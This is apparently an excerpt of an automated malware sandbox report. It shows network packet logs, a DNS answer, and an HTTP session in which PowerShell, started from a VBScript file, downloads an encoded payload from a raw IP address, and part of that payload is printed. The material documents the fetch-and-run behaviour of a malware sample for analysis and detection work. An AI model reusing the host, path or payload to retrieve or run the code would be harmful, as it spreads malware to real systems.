                                    Apr 15, 2025 17:35:15.458906889 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.458921909 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.458921909 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.459136009 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.459136009 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587003946 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587033987 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587053061 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587066889 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587080956 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587095022 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587109089 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587124109 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587137938 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587151051 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587166071 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587171078 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587171078 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587181091 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587198019 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587203979 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587203979 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587223053 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587239027 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587253094 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587266922 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587269068 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587269068 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587281942 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587296963 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587311029 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587321043 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587321043 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587327003 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587341070 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587354898 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587372065 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587388039 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587388039 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587388039 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587402105 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587412119 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587419987 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587435961 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587450981 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587466002 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587477922 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587477922 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587481022 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587496042 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587511063 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587524891 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587533951 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587533951 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587539911 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587553978 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587568998 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587583065 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587593079 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587593079 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587599039 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587614059 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587629080 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587642908 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587656021 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587656021 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587657928 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587672949 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587688923 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587702990 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587717056 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587727070 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587727070 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587732077 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587745905 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587759972 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587773085 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587773085 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587774992 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587790966 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587805986 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587820053 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587824106 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587835073 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587848902 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587862968 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587862968 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587862968 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587877035 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587891102 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587904930 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587918043 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587932110 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587934017 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587934017 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587948084 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587961912 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587976933 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587976933 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587976933 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587990999 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588006020 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588020086 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588032961 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588040113 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588040113 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588048935 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588063002 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588077068 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588088989 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588088989 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588090897 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588105917 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588120937 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588135958 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588150024 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588150024 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588150024 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588164091 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588179111 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588191986 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588207006 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588207006 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588207006 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588219881 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588234901 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588248014 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588262081 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588262081 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588274956 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588289976 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588290930 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588304043 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588319063 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588334084 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588346958 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588360071 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588373899 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588373899 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588375092 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588395119 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588408947 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588423967 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588423967 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588423967 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588438988 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588454008 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588468075 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588479996 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588479996 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588481903 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588495970 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588501930 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588510990 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588526011 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588541985 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588556051 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588570118 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588570118 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588570118 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588584900 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588599920 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588613033 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588628054 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588629961 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588640928 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588655949 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588668108 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588673115 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588673115 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588682890 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588696957 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588711023 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.588713884 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588713884 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.588793993 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.630518913 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:20.184202909 CEST4971880192.168.2.468.168.223.108

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Apr 15, 2025 17:35:10.108688116 CEST1.1.1.1192.168.2.40x6430No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                    Apr 15, 2025 17:35:10.108688116 CEST1.1.1.1192.168.2.40x6430No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • 68.168.223.108

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.44971868.168.223.108808104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    Apr 15, 2025 17:35:14.793342113 CEST174OUTGET /JD/Gossipers.toc HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                    Host: 68.168.223.108
                                    Connection: Keep-Alive
                                    Apr 15, 2025 17:35:14.936954975 CEST1358INHTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    Last-Modified: Wed, 26 Mar 2025 22:35:44 GMT
                                    Accept-Ranges: bytes
                                    ETag: "53ac96699f9edb1:0"
                                    Server: Microsoft-IIS/10.0
                                    Date: Tue, 15 Apr 2025 15:35:14 GMT
                                    Content-Length: 575624
                                    Data Raw: 75 37 39 6c 47 41 42 6d 49 66 59 44 58 43 51 45 67 38 38 41 75 65 55 57 4a 6a 79 42 77 63 32 6e 50 68 53 42 38 62 4b 2b 5a 46 42 6d 77 65 41 41 75 68 72 41 46 56 58 41 36 51 41 67 32 7a 48 4b 67 2b 67 41 69 52 51 4c 67 4d 6b 41 30 65 4c 42 34 51 43 44 77 51 53 41 77 67 43 42 2b 51 46 64 7a 77 4a 38 34 47 61 42 2f 31 4a 48 69 30 51 6b 42 49 50 79 41 49 6e 44 67 66 6e 36 61 50 34 61 67 63 50 6a 36 4d 63 42 42 41 43 36 76 6d 41 71 44 34 48 79 6f 37 79 64 6b 6f 48 79 48 64 79 33 6e 53 77 41 5a 6f 58 32 69 77 77 51 67 4f 73 41 69 51 77 54 5a 6f 48 2b 58 6b 78 43 49 4e 75 42 2b 71 51 5a 42 67 42 31 35 49 44 44 41 49 6c 63 4a 41 77 68 77 49 48 74 41 41 4d 41 41 49 44 4c 41 49 74 55 4a 41 69 41 79 51 43 4c 66 43 51 45 6b 49 6e 72 68 4d 6d 42 77 35 77 41 41 41 43 44 77 77 42 54 5a 73 48 6e 41 47 70 41 5a 6f 50 4a 41 49 6e 72 5a 6f 50 7a 41 4d 65 44 41 41 45 41 41 41 44 51 36 67 4b 44 77 67 43 42 77 77 41 42 41 41 43 44 7a 67 42 54 5a 6f 50 75 41 49 6e 72 49 66 61 4a 75 77 51 42 41 41 43 51 67 63 4d 45 41 51 [TRUNCATED]
                                    Data Ascii: u79lGABmIfYDXCQEg88AueUWJjyBwc2nPhSB8bK+ZFBmweAAuhrAFVXA6QAg2zHKg+gAiRQLgMkA0eLB4QCDwQSAwgCB+QFdzwJ84GaB/1JHi0QkBIPyAInDgfn6aP4agcPj6McBBAC6vmAqD4Hyo7ydkoHyHdy3nSwAZoX2iwwQgOsAiQwTZoH+XkxCINuB+qQZBgB15IDDAIlcJAwhwIHtAAMAAIDLAItUJAiAyQCLfCQEkInrhMmBw5wAAACDwwBTZsHnAGpAZoPJAInrZoPzAMeDAAEAAADQ6gKDwgCBwwABAACDzgBTZoPuAInrIfaJuwQBAACQgcMEAQAAwe8AU5Bq/8DhAIPCBZsx9vgxyWYhyYsagflJ2+9VQcHjADkcCnX3ZoPPAEaAygCAfAr7uHXoZoXbi0QK/GaB/ixxKfBmgftLfv/Sgfp0mz5DuqQZBgD8McCF/4t8JAxmhdKBNAc64zOAZj13OYPABMHgADnQdevA6wCJ+5v/15tkhQpYbAgi+CvrREfV6P5qPMWB7lAMbs/SuT6GOmfwRjpr2Il310ipWzafqQs63gA6m7dKqggbTHhFpAp/LbsHq2Qt4TUi/3qLg2hMeEWkCn8tuwerZC3hNSL/eouDaMADJUY5vzrPaDrjM4C/O2gJ32LfiGYTMQH+62pwOLa6ZYM/g826Ot4B0yeDzboILI7oojx7ZjreZlnFiFZYyFd7grzFElm3N9diIEWRqd7qfr469MQ341qMze7L5s0igH3kDcsE6x+yxDfjpHMyEVWPxw4PN9Hppao/nh9ydpY6zb869AXO4jOAAqqNU9HokS46dKAqyNDnl5I6xgGPFzKAOth6Puk/xHb429imYkbkoCfTlJ6Xua4ozl+jq9kWV2neM7TOqNtoRVJwGNBcP8hcnTJyf7cXMoA6lvzB/WaygTrjwY4cX1UF4TrNAZdiMoA6mT6mhjrHayVrgxjtCse83FMsl0X6IbkuKGpi/ksvrEnmRlGixcVs [TRUNCATED]
                                    Apr 15, 2025 17:35:14.936985970 CEST1358INData Raw: 73 52 69 45 75 6e 46 52 48 65 66 2f 7a 43 4a 76 6d 6a 44 38 47 71 73 70 63 46 31 76 42 2f 37 34 72 32 4b 52 37 74 35 77 73 4e 53 54 65 68 63 54 65 5a 51 53 6e 4d 4d 68 56 44 6b 70 6a 73 55 79 6f 51 42 6e 78 39 54 71 33 49 43 44 37 37 70 79 42 2f
                                    Data Ascii: sRiEunFRHef/zCJvmjD8GqspcF1vB/74r2KR7t5wsNSTehcTeZQSnMMhVDkpjsUyoQBnx9Tq3ICD77pyB/eZc3iYi0fS23XIX5f9Wq983d+DrygPN8de1AxuZd4W2WLNmS4E647L9Tg9wgDrsvq/i4zO4zWDYhbN+f4E647L9RjhZgDrsvgXw4zPT0sE4hjqFDsqGanbEu55PhgHjM4++iPmAOrSMjjrjMwHFFTNKVey+qcbmM9
                                    Apr 15, 2025 17:35:14.937000990 CEST1358INData Raw: 63 68 4d 44 31 56 32 4f 73 6f 42 2b 4a 34 31 42 35 39 7a 75 70 49 33 33 6c 70 61 50 64 41 77 77 43 55 53 39 52 44 34 67 6c 54 4c 33 59 71 38 65 32 49 71 38 67 33 38 4a 56 50 4a 36 58 62 55 66 49 4f 49 61 51 48 4c 63 33 46 7a 47 7a 33 33 6a 7a 76
                                    Data Ascii: chMD1V2OsoB+J41B59zupI33lpaPdAwwCUS9RD4glTL3Yq8e2Iq8g38JVPJ6XbUfIOIaQHLc3FzGz33jzv4H4A64zOAOuMzgDoYtrhm+p7ZJ9/Uvyk1iOVraL7xOOMz04EqOFPYPcsByX77Z0rsWWK7CJe/FuPuYbsI4JYycTxt1Woo1nTgUx/747Qpub9kfTQ7MSjVET8r+enZNGEL4Vk/47odC+EzgLMgYAun0jGAOgvtcTjj
                                    Apr 15, 2025 17:35:14.937016010 CEST1358INData Raw: 6f 32 41 4e 41 39 58 35 6f 68 54 76 49 42 57 56 56 4e 34 4b 66 52 33 39 68 73 30 6b 66 62 46 32 61 67 65 58 6c 50 50 48 4a 75 37 4a 32 6f 42 59 59 6d 65 4d 63 73 6d 34 55 69 70 4c 44 58 4f 7a 61 65 62 73 6c 50 63 64 43 72 31 57 50 77 68 53 79 64
                                    Data Ascii: o2ANA9X5ohTvIBWVVN4KfR39hs0kfbF2ageXlPPHJu7J2oBYYmeMcsm4UipLDXOzaebslPcdCr1WPwhSydut1+KjiArq2WqDmYfoXfZy+x3jrwLkAnNAWTCqo3RYLcD1tjz0F8IA64zOAOuMzgDoh0qr68aJ91J7EjsKiy22VPAKRz6Sz0oBsNoFwhTzy6xayaj/GDNrjGrJqeUNijFzsUUa7IcsAHtDtf7sJXzKu9e1Gs/HjZU
                                    Apr 15, 2025 17:35:14.937031984 CEST1358INData Raw: 68 6f 48 44 30 69 46 70 70 56 62 46 4c 59 67 4d 6b 75 33 45 30 39 49 78 55 61 73 76 62 4e 2f 2f 72 70 62 72 4e 65 6c 68 67 6d 48 4b 7a 4b 41 4f 6c 77 78 58 72 65 6d 50 49 6d 68 75 6a 4f 41 4f 75 4d 7a 67 44 72 6a 4d 34 44 42 56 31 4b 73 79 47 4a
                                    Data Ascii: hoHD0iFppVbFLYgMku3E09IxUasvbN//rpbrNelhgmHKzKAOlwxXremPImhujOAOuMzgDrjM4DBV1KsyGJZkixRGMWfx4TmNTz+1oR9il6aOssBzGITb5SFPFj4YsU65aPPWchi3SV/ksFZwrGvCdjiAR0DNEmSZ67jZTOpsP1n/HVAxvXoBF4yckcyvAAvvyppaybXYiRz11aQ3/gbgJ3qRrRrR3q0X/PWmxLjlIlPvbJ3Gj2+
                                    Apr 15, 2025 17:35:14.937047005 CEST1358INData Raw: 6a 75 79 42 7a 63 68 69 38 50 50 4c 4d 4d 62 4a 7a 55 6d 47 56 30 56 7a 73 30 55 32 37 49 45 79 31 73 6b 44 75 59 62 50 6f 4b 5a 56 55 69 49 79 31 66 5a 68 45 72 51 75 68 39 49 76 4d 6c 53 7a 32 6f 76 6f 52 48 59 65 36 4a 2b 69 43 71 36 4f 70 4a
                                    Data Ascii: juyBzchi8PPLMMbJzUmGV0Vzs0U27IEy1skDuYbPoKZVUiIy1fZhErQuh9IvMlSz2ovoRHYe6J+iCq6OpJ7i4BSnhM4BpWE0auTLrUbsg/qVF8jxV6mLY6hJM94/DL7JrducDi1zsQHUJYvDrVz/fWdK0rwnd4iwdXNrE+THcQ9Ri5yBAUdaGVJYfvpOXM/30JIMH7Urb3d+6HO3bUsY5fjFqhsc44zM+mjvbAGxdpo1xyjx11m
                                    Apr 15, 2025 17:35:14.937064886 CEST1358INData Raw: 69 69 46 59 49 73 53 57 6a 50 4d 51 63 54 49 66 35 34 65 33 4f 56 6f 41 2f 37 62 56 59 2f 39 30 7a 4f 41 4f 75 4d 7a 67 44 72 6a 4d 34 44 42 4b 4f 73 2f 4c 66 5a 4a 31 39 35 4b 6f 61 58 33 34 51 72 51 67 70 4d 51 35 52 75 46 50 46 33 39 31 6c 77
                                    Data Ascii: iiFYIsSWjPMQcTIf54e3OVoA/7bVY/90zOAOuMzgDrjM4DBKOs/LfZJ195KoaX34QrQgpMQ5RuFPF391lw52GZVj10YBvQ5KVbmNYrErVF7fkHjM2UcswUyhqdn6fIxdWoOQBD2OyiqB62GJLRenQlLNmMRqb52cZU1zyOU2gIfbeYDKWvmNSQBgDrjM4A64zOAOhB3vEnObWTS4/yFOi9ED4su/ItMUQ5Uo0RufvB15CDdbY8a
                                    Apr 15, 2025 17:35:14.937079906 CEST1358INData Raw: 45 50 5a 61 33 35 77 49 47 57 6b 71 73 41 46 6e 44 7a 76 42 65 48 79 2f 71 61 7a 38 38 41 37 76 39 37 46 42 4b 61 33 2b 36 59 54 50 69 72 72 6e 70 6b 53 47 6c 73 57 70 55 47 43 46 47 6f 6f 34 6f 67 4b 56 37 51 2f 68 78 49 73 5a 76 30 72 56 33 71
                                    Data Ascii: EPZa35wIGWkqsAFnDzvBeHy/qaz88A7v97FBKa3+6YTPirrnpkSGlsWpUGCFGoo4ogKV7Q/hxIsZv0rV3qAWXJ1Cyfj+VfIJjhbZaYoU86t9ihsE44zN6aE6XWdovEN3tPwKDhVmMCgH7hnK/k1qQGKzMDXvhM4BPFP/7JtPuo+HEjR2tJXkPyL4LUXGZPIEp1zOAOuMzgDrjM4DIGocbIeK6PVXhM4CF5JVm9y/2q4LnSEmfro
                                    Apr 15, 2025 17:35:14.937093973 CEST1358INData Raw: 42 65 7a 39 58 2f 69 53 54 6a 4e 63 75 4d 57 5a 41 75 48 55 6a 4b 41 4f 68 79 47 77 44 76 6a 4d 39 4f 42 33 62 65 4c 50 6a 72 5a 41 66 6d 74 45 76 51 4a 4f 73 34 42 79 66 41 53 4b 4d 32 46 50 50 4c 49 67 62 4a 44 4b 57 34 50 68 31 7a 73 32 33 75
                                    Data Ascii: Bez9X/iSTjNcuMWZAuHUjKAOhyGwDvjM9OB3beLPjrZAfmtEvQJOs4ByfASKM2FPPLIgbJDKW4Ph1zs23u7CIGQLivqdWp/umAz+6648pAwQy43oH745xk3is1pQ4Gwbw4TG50ZmO2wV0hE9JsRkhqBam9VBeK7tlNhC7VgP+NlPqDJ4NLkHLJ2D3u7puMJsnaVUGj04w1iHLMCOrGnZvX8MU2knA0VkJ6O0Ea/KiNpV/QC16Ue
                                    Apr 15, 2025 17:35:14.937109947 CEST1358INData Raw: 67 79 73 67 31 62 54 46 64 50 2b 4e 71 32 72 75 65 65 7a 61 56 34 7a 4f 50 76 68 5a 33 67 6a 71 34 59 54 70 61 42 77 64 72 35 79 4b 79 63 74 51 47 66 74 51 31 68 2b 59 42 79 46 71 4d 2b 59 55 2b 34 77 6b 67 30 70 69 44 66 52 69 7a 36 73 4d 46 62
                                    Data Ascii: gysg1bTFdP+Nq2rueezaV4zOPvhZ3gjq4YTpaBwdr5yKyctQGftQ1h+YByFqM+YU+4wkg0piDfRiz6sMFb7bMH4MlVlbLsXwnPrJKuboFzuIzgGtazUIDSFWPWiyycR7e2Y/jGbJxB6JbDKE40QHTBI47EoU8fem1rwnc4j0dXGby9j5IA0EXninL6fkbt1QZyKGsu2+xdyNgBsWESAT7vbJ/k0gYumNbib5nj2I5R61SLuMasn
                                    Apr 15, 2025 17:35:15.067766905 CEST1358INData Raw: 37 2b 59 7a 48 2f 46 74 49 79 67 65 53 34 69 6a 31 51 51 73 6e 65 2f 6d 2b 79 79 58 4f 7a 53 57 4c 73 6b 59 46 61 58 78 31 57 50 30 54 53 79 64 36 47 51 36 68 6d 37 46 4b 39 5a 49 7a 31 56 6a 31 30 50 75 70 39 66 38 4e 75 4f 70 6f 77 53 38 70 45
                                    Data Ascii: 7+YzH/FtIygeS4ij1QQsne/m+yyXOzSWLskYFaXx1WP0TSyd6GQ6hm7FK9ZIz1Vj10Pup9f8NuOpowS8pEJ4+/KEDgaMLferGWxiWRJ1EBZy2LZQy37Q1nEYtmhYfwwG+EBYByzADKTp9rp/DCdDFhci6tVUUXmi6Uktv3i9/dcfW5mXdZeJGhPOPikvjNoBM+5uB0S4jOAs7s2TCiXhbJeuLOsWTmlIaYW/0CCnvTDNuEzgDq0


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:11:35:08
                                    Start date:15/04/2025
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs"
                                    Imagebase:0x7ff61fb00000
                                    File size:170'496 bytes
